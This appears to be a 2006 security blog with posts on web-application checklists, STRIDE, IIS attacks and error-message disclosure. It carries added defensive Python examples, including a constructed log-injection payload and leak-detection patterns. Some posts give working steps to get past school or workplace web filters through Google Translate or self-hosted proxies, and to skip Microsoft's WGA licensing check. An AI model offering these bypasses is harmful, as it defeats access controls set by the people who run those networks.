Friday, December 22, 2006

Using Google to View MySpace or Any Restricted Site

Most companies and schools employ proxy servers to filter unwanted sites so employees won't waste precious company resources surfing sites that the companies deem unproductive. While the use of proxy servers to block unwanted sites may be understandable in commercial cases, there are also companies that are overdoing it, banning almost all websites and creating a lot of inconvenience to their employees.

If you are in such an environment, what can you do about it? One way is to use an anonymous proxy server (such as http://www.spysurfing.com/). But once the system administrator learns about it, he will likely block that site as well. A way that is much harder to block outright, because few administrators will ban google.com, is to use Google itself (yes, you read that right).


Google Translate is a translation service provided by Google to help you translate text or web pages to the language you desire. Some of the languages supported include English, Simplified Chinese, Spanish, French, German, Korean, Japanese, etc.

If you want to translate a page from one language to another, here is the URL format:

http://www.google.com/translate?langpair=en|es&u=www.websiteurl.com

where en|es is the language pair to translate from one language to the other (here it is English to Spanish), and www.websiteurl.com is the site you want to translate.

An interesting workaround to bypass your proxy server is to use Google Translate to translate the page you want to view from English to English, like this:

http://www.google.com/translate?langpair=en|en&u=www.websiteurl.com

Here, since the source and destination languages are the same, Google Translate performs no translation: it simply fetches the page on its own servers and returns it to you, so your proxy only ever sees a request to google.com. As an example, if your workplace/school has blocked MySpace.com, you can use the following URL to view it:

http://www.google.com/translate?langpair=en|en&u=www.myspace.com

Using Google Translate to bypass your proxy server does not work all of the time. In some instances it does not work at all. In some cases Google Translate will only display the text of the site you want to view (the images will not load), while in other cases you may need to translate the page into another language before you can view its content. Bear in mind that the full URL, including the u= parameter naming the real site, still appears in the proxy log, so the bypass is visible to anyone who reads the logs, and Google sees every page you fetch this way.
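
The filter's side of the trick, as an added example that is not part of the original post: a filter that only compares the requested hostname against its blocklist sees google.com and lets the request through, while one that knows Google Translate is a forwarder unwraps the u= parameter first. The blocklist and the forwarder table are assumptions for the demo (translate.google.com is listed as a second front end to the same service; add whatever other translate or cache front ends appear in your own logs).

```python
from urllib.parse import parse_qs, urlparse

# Added example, not from the original post. BLOCKED_HOSTS and FORWARDERS
# are assumptions for the demo: the post names only www.google.com/translate.
BLOCKED_HOSTS = {"myspace.com", "www.myspace.com"}
FORWARDERS = {("www.google.com", "/translate"), ("translate.google.com", "/translate")}


def _with_scheme(url):
    """The u= value is often written without a scheme, e.g. www.site.com."""
    return url if "://" in url else "http://" + url


def _host(url):
    return (urlparse(_with_scheme(url)).hostname or "").lower()


def host_only_decision(url):
    """What a hostname-only filter decides: it never looks inside the query."""
    return "block" if _host(url) in BLOCKED_HOSTS else "allow"


def unwrap_forwarders(url, max_depth=5):
    """Follow u= through known forwarders until a non-forwarder host is reached.

    max_depth stops translate-inside-translate chains from looping forever;
    if it is exhausted the last forwarder URL is returned as-is.
    """
    current = _with_scheme(url)
    for _ in range(max_depth):
        parts = urlparse(current)
        if ((parts.hostname or "").lower(), parts.path) not in FORWARDERS:
            break
        inner = parse_qs(parts.query).get("u")
        if not inner:
            break
        current = _with_scheme(inner[0])
    return current


def forwarder_aware_decision(url):
    """Apply the blocklist to the real destination, not to the forwarder."""
    return "block" if _host(unwrap_forwarders(url)) in BLOCKED_HOSTS else "allow"
```

A stricter filter would also block when unwrap_forwarders gives up at max_depth, since a request nested that deeply is itself suspicious.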

Monday, November 20, 2006

UI Security Check #1

I was trying to collate a few checks for web UI security. Here are some things for check one.
I invite people to put in their suggestions and comments on it.

#1. Does the UI disclose information that might compromise the security of the system?

  • Don’t provide information in error messages that might compromise the security of the system.
  • Don’t reveal data store locations and URLs when they are not necessary.
  • Mask sensitive information such as the SQL Server name, user ID and password.
  • Don’t echo user-supplied input back in error messages; that is a reflected cross-site scripting vector.
  • Don’t allow links to open executables.
  • Don’t provide error information with clickable links. Convert links to plain text so that they are scrutinised before being launched.
  • Ensure that logs are correctly stripped of sensitive information.

Relevance: Developer
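
One way to enforce the first three items and the last one at the boundary between an internal exception and the UI, as an added example that is not part of the original checklist: the client receives a fixed message and a reference id, and the full detail reaches the server log only after connection-string secrets and file paths have been masked. The key names, the path patterns and the sample exception are illustrative assumptions.

```python
import logging
import re
import uuid

# Added example, not from the original checklist. The patterns below are
# illustrative: extend them to whatever your drivers and frameworks emit.
log = logging.getLogger("app.errors")

# key=value pairs as they appear in connection strings and driver messages
_SECRET_PAIRS = re.compile(
    r"(?i)\b(server|data source|database|uid|user id|pwd|password)\s*=\s*[^;\s\"]+")
# Windows drive paths and absolute Unix paths (data store locations)
_PATHS = re.compile(r"(?i)\b[a-z]:\\[^\s\"']+|/(?:[\w.-]+/)+[\w.-]+")


def redact(text):
    """Mask secrets and locations before a message is written anywhere."""
    text = _SECRET_PAIRS.sub(lambda m: m.group(1) + "=***", text)
    return _PATHS.sub("[path]", text)


def render_error(exc):
    """Return (status, body) for the client and log the redacted detail.

    The body is a constant plus an id: it never echoes request data, so it
    cannot carry reflected script, and it contains no links. The id lets
    support staff find the complete record in the server log.
    """
    ref = uuid.uuid4().hex[:12]
    log.error("ref=%s type=%s detail=%s", ref, type(exc).__name__, redact(str(exc)))
    return 500, {
        "message": "The request could not be completed. Quote reference %s when reporting it." % ref,
        "reference": ref,
    }


def leaks(text, *secrets):
    """Review helper: which of the given secrets appear verbatim in text?"""
    return [s for s in secrets if s in text]


if __name__ == "__main__":
    # constructed failure, in the style a database driver reports it
    exc = RuntimeError(
        "Login failed. server=SQL01; database=orders; uid=app_user; pwd=Pa55w0rd; "
        "template D:\\Inetpub\\shop\\checkout.aspx")
    print(render_error(exc))
    print(redact(str(exc)))
```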

Wednesday, November 15, 2006

Web Services Design Security Considerations

I. Information Gathering

  1. WSDL Retrieval: Identify web method call mechanics
  2. SOAP Error Messages
  3. Web Method Enumeration: Identify methods not published in the WSDL.

II. Parameter Manipulation

  1. Identify mishandling of numerical fields, character strings, Base64 data handling, etc.
  2. Identify SQL Injection/XPATH Injection Vulnerabilities
  3. XML input data is validated based on an agreed schema.
  4. Where parameter manipulation is a concern (particularly where messages are routed through multiple intermediary nodes across multiple network links), messages are digitally signed so that tampering is detectable.
  5. Determine whether the logging mechanism is vulnerable to arbitrary entry creation via carriage return and line feed injection.
  6. Assess the possibility of inserting HTML tags into a HTML based log.
  7. Assess the possibility of inserting XML elements and/or attributes into an XML based log.
  8. Determine the logging mechanism’s susceptibility to white space injection.
  9. Assess the ability of the web service to log messages that contain special separator characters.
  10. Assess the handling of log data after reaching the upper log size limit.
  11. Assess the web service’s susceptibility to LDAP injection.
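
One logging helper that answers items 5 to 9 of this section, with field-size capping towards item 10, as an added example that is not part of the original checklist: every text record is a single line, an untrusted value cannot end the record or start a new one, markup is escaped for HTML and XML logs, and over-long fields are cut so that one message cannot exhaust the log. The record layouts and the forged login value are constructed for the demo.

```python
import html
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

# Added example, not from the original checklist. Record layouts are assumptions.
MAX_FIELD = 256
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")   # CR, LF, TAB, NUL, ...


def sanitize_field(value, max_len=MAX_FIELD):
    """Make an untrusted value safe inside a double-quoted text field."""
    text = str(value)
    text = text.replace("\\", "\\\\").replace('"', '\\"')          # quoting stays unambiguous
    text = _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), text)  # CR/LF become visible escapes
    if len(text) > max_len:
        text = text[:max_len] + "...[truncated]"
    return text


def naive_text_record(ts, event, user, result):
    """The pattern the checklist warns about: the value goes in verbatim."""
    return "%s event=%s user=%s result=%s\n" % (ts, event, user, result)


def safe_text_record(ts, event, user, result):
    return '%s event=%s user="%s" result="%s"\n' % (
        ts, event, sanitize_field(user), sanitize_field(result))


def safe_xml_record(ts, event, user, result):
    """Control characters are dropped, then quoteattr escapes <, & and quotes,
    so the value cannot close its attribute or add elements/attributes."""
    clean = [quoteattr(_CONTROL.sub("", str(v))) for v in (ts, event, user, result)]
    return "<entry ts=%s event=%s user=%s result=%s/>" % tuple(clean)


def parse_xml_record(record):
    """What a log reader sees: the element name and its attributes."""
    el = ET.fromstring(record)
    return el.tag, dict(el.attrib)


def safe_html_record(ts, event, user, result):
    cells = (html.escape(str(c), quote=True) for c in (ts, event, user, result))
    return "<tr>" + "".join("<td>%s</td>" % c for c in cells) + "</tr>"


if __name__ == "__main__":
    # constructed payload: a username carrying a fake "successful admin login" line
    forged = "alice\n2006-11-15 10:00:01 event=login user=admin result=success"
    print(naive_text_record("2006-11-15 10:00:00", "login", forged, "failure"), end="")
    print(safe_text_record("2006-11-15 10:00:00", "login", forged, "failure"), end="")
```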

III. Authentication and Authorization

  1. Web services that support restricted operations or provide sensitive data require and support authentication.
  2. Where appropriate, access to publicly accessible Web methods is restricted using declarative principal permission demands.

IV. Sensitive Data

  1. Sensitive data in Web service SOAP messages is encrypted using XML encryption OR messages are only passed over encrypted communication channels (for example, using SSL.)
  2. Identify the encryption cipher used in the application.
  3. Determine the items within web service communications that are encrypted.
  4. Determine the items within web service communications that are protected by message integrity checks.

V. Exception Handling

  1. SOAP exceptions are thrown and returned to the client using the standard SOAP Fault element.
  2. If application-level exception handling is required a custom SOAP extension is used.

VI. Auditing & Logging

  1. The Web service logs transactions and key operations.

VII. Proxy Considerations

  1. The URL Behavior property of the Web reference is set to dynamic for added flexibility.
  2. The endpoint address in Web Services Description Language (WSDL) is checked for validity.

VIII. Configuration

  1. Unnecessary Web service protocols, including HTTP GET and HTTP POST, are disabled.
  2. The Web service runs using a least-privileged process account.
  3. Debugging and Tracing are disabled.
  4. Identify directory traversal vulnerabilities.
  5. Assess the level of information disclosure from temporary files.

Wednesday, November 08, 2006

Alternative to IE and Firefox

An interesting alternative is SecureIE (www.secureie.com), which costs $30 and seems to outperform Firefox and IE in the security field (http://tinyurl.com/bjayn).

Friday, October 20, 2006

Design Considerations for Security

1. Do not trust client-side input. Security decisions should not rely on client-side validation; they are made on the server side.

2. Design the application to fail gracefully. The exception management approach should not reveal any internal software information.

3. Partition the application into publicly accessible and restricted areas. Isolate the higher-privileged sections of the application.

4. Apply granular authorization checks to pages and directories.

5. Web controls, user controls and resource access code are each partitioned into their own assemblies for granular security.

6. Mechanisms have been identified to secure credentials, authentication tickets and other sensitive information both over the network and in persistent stores.

Thursday, October 12, 2006

Firefox popups

Like you, I love Firefox for many reasons, including popup blocking. So over the last few weeks I’ve been surprised to see occasional popups.

It turns out that some clever people figured out that you could launch popups from Flash, getting around the Firefox default settings.

Fortunately, you can get around it:

1. Type about:config into the Firefox location bar.
2. Right-click on the page and select New and then Integer.
3. Name it privacy.popups.disable_from_plugins
4. Set the value to 2.

The possible values are:

* 0: Allow all popups from plugins.
* 1: Allow popups, but limit them to dom.popup_maximum.
* 2: Block popups from plugins.
* 3: Block popups from plugins, even on whitelisted sites.

Perspective of Performance and Security in IT

Performance and security are like brothers in IT. They are similar and yet they fight each other at times.

Both performance and security are important inherent qualities in IT systems. Who would not want a fast and secured IT system? You want your home computer to be fast and secured. The bank CEO wants his Internet banking system to be fast and secured for his customers.

This was a very nice article on ACE Team Blog. If you wish to read more...

Here it is: http://blogs.msdn.com/ace_team/archive/2006/07/03/655524.aspx

The Oracle Global Product Security Blog

Have you ever seen this?

The Oracle Global Product Security Blog

Oracle is getting committed to security by rating vulnerabilities on its security blog. :)

Security researchers have criticized Oracle in the past for the time the company has taken to fix vulnerabilities.

In July 2005, security experts at Red Database Security outed six flaws, claiming that the company had more than 650 days to fix the security issues.


Peter Finnigan, who first noted the change in policy, has provided a great list of tools for auditing and testing Oracle databases. If you get a chance, do visit his site at:
http://www.petefinnigan.com

Developing More-Secure Microsoft® ASP.NET 2.0 Applications Now Available

A new book in the Secure Software Development Series, this time from Dominick Baier is now available from Microsoft Press.

It covers ASP.NET 2.0 security features as well as security defenses and design and coding best practices. There’s also a chapter on the not-so-well-understood aspect of building and deploying least-privilege and partial trust ASP.NET 2.0 applications. This is a must-read chapter for Web site hosters.

You can get more info about the book here.

Monday, October 09, 2006

Spoofing threats are usually associated with a wily hacker being able to impersonate a valid system user or resource to get access to the system and thereby compromise system security.

Tampering with data involves the malicious modification of system or user data with or without detection.

Repudiation threats are associated with users—malicious or otherwise—who can deny performing an action without administrators having any way to prove otherwise. An example of a repudiation threat is a user performing an illegal operation in a system that lacks the ability to trace such operations.

Information disclosure threats involve the compromising of private or business-critical information through the exposure of that information to individuals who are not supposed to see it.

Denial of service (DoS) threats when carried out deny service to valid users—for example, by making the system temporarily unavailable or unusable or by forcing a reboot or restart of the user’s machine.

Elevation of privilege: In this type of threat, an unprivileged user gains privileged access and thereby has sufficient access to compromise or destroy the entire system.

Friday, September 22, 2006

Attacks against IIS

IIS is one of the most widely used web server platforms on the Internet, and Microsoft's web server has been a frequent target over the years; many vulnerabilities in it have been exploited.

Examples include:
  • ::$DATA vulnerability
  • showcode.asp vulnerability
  • Piggybacking vulnerability
  • Privilege command execution
  • Buffer Overflow exploits (IIShack.exe)
IIS Components

  • IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities.
  • Example: Server side scripting, Content Indexing, Web Based printing etc.
  • This architecture gives attackers many different pieces of functionality to exploit via malicious input.
ISAPI DLL Buffer Overflows

  • One of the most severe security vulnerabilities associated with ISAPI DLLs is the buffer overflow.
  • In 2001, IIS servers were ravaged by the Code Red worm, which exploited a buffer overflow in the Index Server ISAPI extension, and by Nimda, which spread through several IIS flaws including directory traversal and the backdoors left behind by Code Red II.

Thursday, September 07, 2006

Download everything from Microsoft without WGA Check

When you want to download a file from Microsoft, a WGA (Windows Genuine Advantage) check is performed. Microsoft installs a small piece of software on your computer that contacts the Microsoft server and checks for validity. If the check fails you will not be able to download the file(s). The following method lets you download any file from Microsoft without a WGA check.

All you need is the tool mgadiag.exe and the download url of the file that you want to download. Mgadiag.exe is the Microsoft Genuine Advantage Diagnostic Tool. Start this tool and check the value of the “Download Center Code”, this should be seven chars consisting of upper case letters and numbers. Remember that code and open the website of the file that you want to download.

A download page looks similar to this one for Internet Explorer 7. All you need to do is append the following value to the url and you will be able to download the file without a WGA check.

&Hash=”download center code”

Replace the “download center code” with the code that you looked up in the mgadiag.exe tool. This code changes frequently, make sure you have the correct code before starting the downloads.

To sum it up:
  1. download mgadiag.exe
  2. start mgadiag.exe and look at the download center code
  3. visit a download page at microsoft.com
  4. append &Hash=”download center code” to the url (example &Hash=6VJPCR9), no quotation marks needed
  5. Hit enter

Microsoft is probably going to fix this soon, it is working nevertheless at the moment.

Wednesday, September 06, 2006

Free Web Proxy List

A web proxy is becoming more and more important on today's internet. Schools and companies tend to block sites pretty quickly nowadays, especially when the blocking is directed at just a few websites and not every website in that category. Web proxies might be able to sneak past these policies and display the site in your browser even though it is banned on the network.

How do web proxies work?

A network bans a website by its IP address, its name or part of its name. A web proxy shows only its own address to the network, not the user's real destination, so the filter sees nothing wrong and the banned site is reachable. The only thing that might happen is that the admin bans the web proxy as well, but that is not a big deal either: hundreds of web proxies exist, so just switch to a new one and you can visit the banned site again.

Setup your own Web Proxy:

Let us assume that all proxy websites have been banned in your network and you can't find a single web proxy that still works. Your best choice is to create your own web proxy at an address that only you know. All you need is the PHP web proxy "poxy" and some web space with PHP to upload it to. Search Google for "free webspace php" and you should find hosts that let you use PHP and upload your web proxy.

You can alternatively use a CGI web proxy, which needs web space with CGI enabled.
Web Proxy List:

Please note that the list does not show whether a web proxy can handle scripts; I did not find a reliable way to test this for all languages out there, so it has not been added to the list. I also removed websites that loaded slowly, displayed errors or forced you to click on an ad before you could use the service.

It is quite likely that the word "proxy" has been banned as well, so try web proxies that do not have "proxy" in their URL.

Sunday, August 20, 2006

Error document information and what it indicates.

ODBC Error Code = 37000 (Syntax error or access violation)

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.

Data Source = "ECommerceTheArchSupport2" SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm

The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM


This error message reveals that the target application runs on ColdFusion (the CFQUERY tag) against Microsoft SQL Server through ODBC, that the query is assembled by string concatenation (the statement ends in "QuickJumpId =" with the value missing, so that parameter is a candidate for SQL injection), and it discloses the data source name and the physical directory structure (K:\InetPub\clients\login\http).
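
A scanner a tester can run over an HTTP response body to flag exactly these disclosures, as an added example that is not part of the original post. The sample body is the error text above; the patterns are illustrative and cover the Microsoft/ODBC/ColdFusion style seen here, so extend them for other stacks.

```python
import re

# Added example, not from the original post. Patterns are illustrative.
LEAK_PATTERNS = {
    "odbc_error_code": re.compile(r"ODBC Error Code\s*=\s*\d+"),
    "db_driver":       re.compile(r"\[Microsoft\]\[ODBC [^\]]+\]\[[^\]]+\]"),
    "data_source":     re.compile(r'Data Source\s*=\s*"[^"]+"'),
    "sql_text":        re.compile(r"\b(?:SELECT|INSERT|UPDATE|DELETE)\b[^\"\n]*", re.I),
    "windows_path":    re.compile(r"[A-Za-z]:\\[^\s\"<>]+"),
    "cf_tag":          re.compile(r"\(CF[A-Z]+\)"),
}

# the error page from the post, embedded so the scanner runs offline
SAMPLE_ERROR_PAGE = r"""ODBC Error Code = 37000 (Syntax error or access violation)

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.

Data Source = "ECommerceTheArchSupport2" SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm

The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM
"""


def scan_for_leaks(body):
    """Return (category, matched text) pairs found in a response body."""
    hits = []
    for name, pattern in LEAK_PATTERNS.items():
        hits.extend((name, m.group(0)) for m in pattern.finditer(body))
    return hits


def assess(hits):
    """Turn raw hits into the facts a tester records about the target."""
    facts = {}
    for name, text in hits:
        if name == "db_driver" and "SQL Server" in text:
            facts["backend"] = "Microsoft SQL Server (via ODBC)"
        elif name == "cf_tag":
            facts["platform"] = "ColdFusion"
        elif name == "windows_path":
            facts.setdefault("paths", set()).add(text)
        elif name == "data_source":
            facts["data_source"] = text.split('"')[1]
        elif name == "sql_text":
            facts["query"] = text.strip()
            # a statement that ends in '=' with nothing after it was built by
            # concatenating the (empty) parameter: test it for injection
            if facts["query"].endswith("="):
                facts["dynamic_sql"] = True
    return facts


if __name__ == "__main__":
    for key, value in assess(scan_for_leaks(SAMPLE_ERROR_PAGE)).items():
        print(key, "=", value)
```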

How do you use RSA for both authentication and secrecy?

RSA is based on the public key/private key concept.

For authentication, the sender signs a hash of the data (MD5/SHA; MD5 and SHA-1 are no longer acceptable, use SHA-256) with its private key, and anyone holding the matching public key can verify it. This is known as a digital signature.

Secrecy (confidentiality) is achieved by encrypting the data with the public key of the target user, who alone holds the private key that decrypts it.

In practice RSA is not used to encrypt the data itself: it is slow, and one RSA operation can only carry a block smaller than the modulus (1024 bits here).
Instead a symmetric session key (128/256 bits) is established between the communicating parties, typically by encrypting it under the recipient's RSA public key, and that key is used to encrypt the data.
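
The two roles traced end to end with nothing but the standard library, as an added example that is not part of the original post: the sender signs the hash with its private key, a fresh session key is encrypted to the recipient's public key, and the session key encrypts the data. Textbook RSA without padding and an HMAC-based stream cipher stand in for RSA-PSS, RSA-OAEP and AES-GCM so that every step is visible; do not reuse this in production. The key sizes and the message are constructed for the demo.

```python
import hashlib
import hmac
import random
import secrets

# Added example, not from the original post. Toy primitives: no RSA padding,
# HMAC keystream instead of AES. For real use take a vetted library.
_rng = random.SystemRandom()


def is_probable_prime(n, rounds=16):
    """Miller-Rabin primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits):
    while True:
        cand = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # full size, odd
        if is_probable_prime(cand):
            return cand


def generate_keypair(bits=1024):
    """Return (public, private) as (n, e) and (n, d)."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    return (p * q, e), (p * q, pow(e, -1, phi))  # pow(e, -1, m) needs Python 3.8+


def sign(private_key, message):
    """Authentication: the hash is 'encrypted' with the sender's private key."""
    n, d = private_key
    return pow(int.from_bytes(hashlib.sha256(message).digest(), "big"), d, n)


def verify(public_key, message, signature):
    n, e = public_key
    return pow(signature, e, n) == int.from_bytes(hashlib.sha256(message).digest(), "big")


def _sig_len(key):
    """Byte length of a signature under this key's modulus."""
    return (key[0].bit_length() + 7) // 8


def _keystream_xor(key, nonce, data):
    """Toy stream cipher: XOR with HMAC-SHA256(key, nonce || counter) blocks."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)


def seal(sender_private, recipient_public, message):
    """Sign, then encrypt under a fresh session key that is RSA-encrypted to the recipient."""
    n_r, e_r = recipient_public
    session_key, nonce = secrets.token_bytes(16), secrets.token_bytes(12)
    plaintext = sign(sender_private, message).to_bytes(_sig_len(sender_private), "big") + message
    ciphertext = _keystream_xor(session_key, nonce, plaintext)
    tag = hmac.new(session_key, nonce + ciphertext, hashlib.sha256).digest()
    # a 128-bit key is far smaller than the modulus, so one RSA operation carries it
    wrapped_key = pow(int.from_bytes(session_key, "big"), e_r, n_r)
    return {"key": wrapped_key, "nonce": nonce, "ct": ciphertext, "tag": tag}


def open_envelope(recipient_private, sender_public, env):
    """Recover the session key, check integrity, then authenticate the sender."""
    n_r, d_r = recipient_private
    k = pow(env["key"], d_r, n_r)
    if k >= 1 << 128:
        raise ValueError("wrapped key does not decrypt under this private key")
    session_key = k.to_bytes(16, "big")
    tag = hmac.new(session_key, env["nonce"] + env["ct"], hashlib.sha256).digest()
    if not hmac.compare_digest(tag, env["tag"]):
        raise ValueError("ciphertext was tampered with or the key is wrong")
    plaintext = _keystream_xor(session_key, env["nonce"], env["ct"])
    cut = _sig_len(sender_public)
    signature, message = int.from_bytes(plaintext[:cut], "big"), plaintext[cut:]
    if not verify(sender_public, message, signature):
        raise ValueError("signature does not verify: sender is not who it claims")
    return message
```

Signing before encrypting means the signature travels inside the ciphertext, so an eavesdropper learns neither the content nor who signed it; the recipient checks the tag first and the signature second, so a tampered envelope is rejected before any signature arithmetic is done on attacker-controlled bytes.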

Thursday, August 03, 2006

Performance Testing Tools [.NET]

*Network Analysis Tool – application EKG by Leadbyte (http://www.leadbyte.com/)

*ASP.NET Profiling Tool – Ants Profiler by red-gate software (http://www.red-gate.com/)

Built-in Tools – IIS Log, SQL Profiler, SQL QA, Event Viewer, Perfmon/Sysmon, and ASP.NET Trace

New !! OWASP Mumbai Chapter Activity Site

Hey, I have a great thing to share....

I have made a new Site for detailing OWASP Mumbai Chapter Activities.
Please have a look at the site to download the presentations of OWASP Chapter Meetings, Read Meeting Notes, View Meeting Snaps and much more....

Link: http://owasp.mumbai.googlepages.com/

Do send me your response...

~ Dharmesh

Tuesday, July 25, 2006

Registrations for OWASP Mumbai Meet [31st July 15:00hrs]

Hi All,

Everyone is welcome to join us at our next chapter meet to be held on Monday, 31st of July.

Registrations for the event are free. If you are willing to attend, just send a mail to dharmeshmm@owasp.org as confirmation.

If you would like to speak at the event or sponsor, contact me ASAP.

Theme of Meeting: Securing Web Services

Details of the Meet:

Time: 03:00 PM - 05:00 PM

Sponsor and Venue Details:

Tech Mahindra Ltd.

Tech Mahindra Limited. Wing 1, Oberoi Estate Gardens, Chandivali, Andheri (E), Mumbai 400 072, Maharashtra, India.

Details of Event: http://www.owasp.org/index.php/Mumbai

In case of any queries, please feel free to contact me at +91 98670 75327.

Thanks & Regards,

Dharmesh M Mehta | Technology Cell | Unit 183, SDF-6 SEEPZ, Mumbai, India | (O) +91-22-6695 2222 Ext: 1005 | (M) +91 98670 75327 | www.mastek.com

http://smartsecurity.blogspot.com

Dream as if you'll live forever. Live as if you'll die today. - James Dean

Friday, July 14, 2006

What is STRIDE

Threats faced by the application can be categorized based on the goals and purposes of the attacks. A working knowledge of these categories of threats can help you organize a security strategy so that you have planned responses to threats. STRIDE is the acronym used at Microsoft to categorize different threat types. STRIDE stands for:

Spoofing. Spoofing is attempting to gain access to a system by using a false identity. This can be accomplished using stolen user credentials or a false IP address. After the attacker successfully gains access as a legitimate user or host, elevation of privileges or abuse using authorization can begin.

Tampering. Tampering is the unauthorized modification of data, for example as it flows over a network between two computers.

Repudiation. Repudiation is the ability of users (legitimate or otherwise) to deny that they performed specific actions or transactions. Without adequate auditing, repudiation attacks are difficult to prove.

Information disclosure. Information disclosure is the unwanted exposure of private data. For example, a user views the contents of a table or file he or she is not authorized to open, or monitors data passed in plaintext over a network. Some examples of information disclosure vulnerabilities include the use of hidden form fields, comments embedded in Web pages that contain database connection strings and connection details, and weak exception handling that can lead to internal system level details being revealed to the client. Any of this information can be very useful to the attacker.

Denial of service. Denial of service is the process of making a system or application unavailable. For example, a denial of service attack might be accomplished by bombarding a server with requests to consume all available system resources or by passing it malformed input data that can crash an application process.

Elevation of privilege. Elevation of privilege occurs when a user with limited privileges assumes the identity of a privileged user to gain privileged access to an application. For example, an attacker with limited privileges might elevate his or her privilege level to compromise and take control of a highly privileged and trusted process or account.

STRIDE Threats and Countermeasures

Threat: Spoofing user identity
Countermeasures:
  • Use strong authentication.
  • Do not store secrets (for example, passwords) in plaintext.
  • Do not pass credentials in plaintext over the wire.
  • Protect authentication cookies with Secure Sockets Layer (SSL).

Threat: Tampering with data
Countermeasures:
  • Use data hashing and signing.
  • Use digital signatures.
  • Use strong authorization.
  • Use tamper-resistant protocols across communication links.
  • Secure communication links with protocols that provide message integrity.

Threat: Repudiation
Countermeasures:
  • Create secure audit trails.
  • Use digital signatures.

Threat: Information disclosure
Countermeasures:
  • Use strong authorization.
  • Use strong encryption.
  • Secure communication links with protocols that provide message confidentiality.
  • Do not store secrets (for example, passwords) in plaintext.

Threat: Denial of service
Countermeasures:
  • Use resource and bandwidth throttling techniques.
  • Validate and filter input.

Threat: Elevation of privilege
Countermeasures:
  • Follow the principle of least privilege and use least privileged service accounts to run processes and access resources.

Tuesday, July 04, 2006

OWASP Mumbai - Next Meeting

Next Meeting - Tentative Monday July 31st 2006
[03:00 PM - 5:00 PM]

Invitations are OPEN for all to present at the Next OWASP Mumbai Meet.

The meeting is to be scheduled tentatively on Monday, 31st July 2006 from 3:00 to 5:00 PM.

Venue and Sponsor Details:

Tech Mahindra Ltd.

Tech Mahindra Limited. Wing 1, Oberoi Estate Gardens, Chandivali, Andheri (E), Mumbai 400 072, Maharashtra, India.

If you would like to speak, please drop in a mail at dharmeshmm@gmail.com

OWASP, the free and open application security community, has gone Wiki.

Tuesday, June 20, 2006

UI Security Checklist

Hi,

I was trying to build a security checklist for the UI of enterprise applications. Maybe people can send their views on it. I plan to build this up as and when I receive feedback.

Some areas that could be starting points, or that the checklist should assist with, are:

· To ensure that the UI safeguards critical information and does not disclose it to attackers

· To reduce the complexity of managing security from the UI

· To ensure the UI enforces security best practices

I hope to get feedback and the checklist in few days...

~ Dharmesh

Wednesday, May 31, 2006

Essential Terminology

  • Threat – An action or event that might prejudice security. A threat is a potential violation of security.
  • Vulnerability – Existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system.
  • Target of Evaluation – An IT system, product, or component that is identified as requiring security evaluation.
  • Attack – An assault on system security that derives from an intelligent threat. An attack is any action that violates security.
  • Exploit – A defined way to breach the security of an IT system through vulnerability.

Thursday, May 25, 2006

Email Evolution

  • Business email will grow by 25–30% through 2009
  • Over 60% of email is spam
  • 80% of viruses enter through the email gateway
  • 75% of a company’s intellectual property is now contained in email
  • 79% of companies accept email as written confirmation of approvals, orders and other transactions
  • Email is now the de facto document of record for corporate communications

Saturday, May 13, 2006

Is your server blacklisted?? Know here...

Appearing on one of these lists is a good sign that your server is being used as an open relay or is otherwise a source of spam.

  List         URL                       What it lists
  ORDB         http://www.ordb.org       Open relays
  SBL          http://www.spamhaus.org   Spam sources
  XBL          http://www.spamhaus.org   Compromised hosts
  SORBS DUHL   http://www.sorbs.net      Dynamic IPs
  DSBL         http://www.dsbl.org       Insecure servers
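
How such a list is actually consulted, as an added example that is not part of the original post: a DNS-based blocklist is queried by reversing the address octets and prefixing them to the list's zone; an A record inside 127.0.0.0/8 means "listed" and its last octet encodes the reason. The zone names are assumptions for the Spamhaus lists named above, and the resolver is injectable so the logic can be exercised without network access. One caveat for anyone wiring this into a mail server: lists die (ORDB shut down at the end of 2006 and later answered every query as listed), so a retired zone left in the configuration can block all incoming mail.

```python
import socket

# Added example, not from the original post. Zone names are assumptions for
# the lists named in the post; check each operator's current documentation.
ZONES = {
    "SBL": "sbl.spamhaus.org",
    "XBL": "xbl.spamhaus.org",
}


def dnsbl_query_name(ip, zone):
    """'1.2.3.4' against 'sbl.spamhaus.org' becomes '4.3.2.1.sbl.spamhaus.org'."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError("IPv4 dotted quad expected: %r" % ip)
    return ".".join(reversed(octets)) + "." + zone


def _resolve(name):
    """Real lookup: NXDOMAIN (no answer) means the address is not listed."""
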